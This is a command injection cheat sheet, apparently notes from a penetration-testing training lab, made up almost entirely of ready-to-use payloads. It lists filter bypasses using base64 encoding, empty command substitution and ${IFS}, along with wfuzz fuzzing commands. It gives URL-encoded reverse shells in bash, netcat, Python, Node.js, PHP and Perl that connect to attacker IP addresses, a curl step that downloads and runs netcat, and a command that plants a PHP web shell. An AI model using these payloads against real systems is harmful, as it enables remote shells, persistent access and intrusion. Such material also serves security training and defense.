Command Injections

Possible command separators on Linux

;         - the second command executes sequentially after the first, regardless of its result
&&        - the second command will only run if the first is successful
||        - the second command will only run if the first is unsuccessful
|         - pipe, i.e. the output of first command is sent as input to the second command
\n (0x0A) - alternative to ';'

Some examples

  | ping -i 30 127.0.0.1 |  
  | ping -n 30 127.0.0.1 |  
  & ping -i 30 127.0.0.1&  
  & ping -n 30 127.0.0.1&  
  ; ping -i 30 127.0.0.1;  
  %0a ping -i 30 127.0.0.1 %0a  
  ping 127.0.0.1

Command substitution inside a statement (the inner command runs inline and its output is inserted)

`cmd`
$(cmd)

Bypass with an empty command substitution

$() - empty command substitution; it expands to nothing, so it splits a keyword without changing the command, e.g.: wh$()oami

Bypass with base64 encoding

echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==

http://<url>/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

Command Injection with WFUZZ:

# note: refine this request with --hh based on the responses
wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://<url>/php/blocklisted.php?ip=127.0.0.1FUZZ

# identify capabilities on target machine
wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://<url>:80/php/index.php?ip=127.0.0.1;which FUZZ"

wfuzz -c -z file,/usr/share/seclists/Fuzzing/command-injection-commix.txt -d "box=127.0.0.1FUZZ&submitt=submit" --hc 404 "http://192.168.201.15/index.php"

Blind Command Injection

# check how long it takes to execute baseline request and then repeat it with a sleep
time curl http://<url>:80/php/blind.php?ip=127.0.0.1

time curl "http://<url>:80/php/blind.php?ip=127.0.0.1;sleep%2020"

Revshell examples

URL-encoded reverse shell example

curl "http://<url>/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.45.225/9090+0>%261'"

Base64 encoded

# double base64-encoded; the trailing sed replaces every space with ${IFS}
# run locally:
echo "echo $(echo 'bash -i >& /dev/tcp/192.168.45.158/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

# use the printed line as the payload

Netcat

curl "http://<url>:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.45.225%209090%20-e%20/bin/bash"

Python

curl "http://<url>/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27"

# better to URL-encode the whole payload, as below
curl "http://<url>/php/index.php?ip=127.0.0.1%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%34%35%2e%32%32%35%22%2c%39%30%39%30%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%29%3b%27"

Node.js

http://<url>:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.45.225 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

PHP

php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# example
http://<url>/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"

# URL-encoded example
http://<url>/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22

Perl

perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# URL-encoded example
http://<url>/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27

File Transfer

curl http://192.168.49.51:80/nc -o /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash

# Example
http://<url>/php/file_transfer_exercise.php?ip=127.0.0.1;curl%20http://192.168.45.225:80/nc%20-o%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.45.225%209090%20-e%20/bin/bash

Web Shell

echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php

# URL-encoded example
http://<url>:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php